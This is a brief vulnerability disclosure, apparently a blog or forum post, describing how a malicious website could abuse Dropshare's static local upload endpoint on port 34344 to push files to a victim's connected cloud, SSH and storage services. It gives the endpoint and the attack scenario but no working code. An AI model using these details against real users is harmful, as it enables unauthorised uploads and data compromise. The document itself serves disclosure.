Basically, anyone who uses this app is vulnerable to cross-infection and data leaks. Assume that user John installed this app, then hacker Alice tricked John to visit their malicious website. In this website, they added code that sends requests to “http://localhost:34344/upload” to upload malicious files to any of the services that John’s computer is connected to via Dropshare, this includes private servers via SSH, Amazon S3, Rackspace Cloud Files, Google Drive, Backblaze B2 Cloud Storage, Microsoft Azure Blob Storage, Dropbox, WeTransfer, and custom Mac network connections. The port number is also static, saving the hacker the need to run a port scanner.
I already contacted Dropshare’s developers to fix the issue, but got not response.
[1] https://news.ycombinator.com/item?id=20399551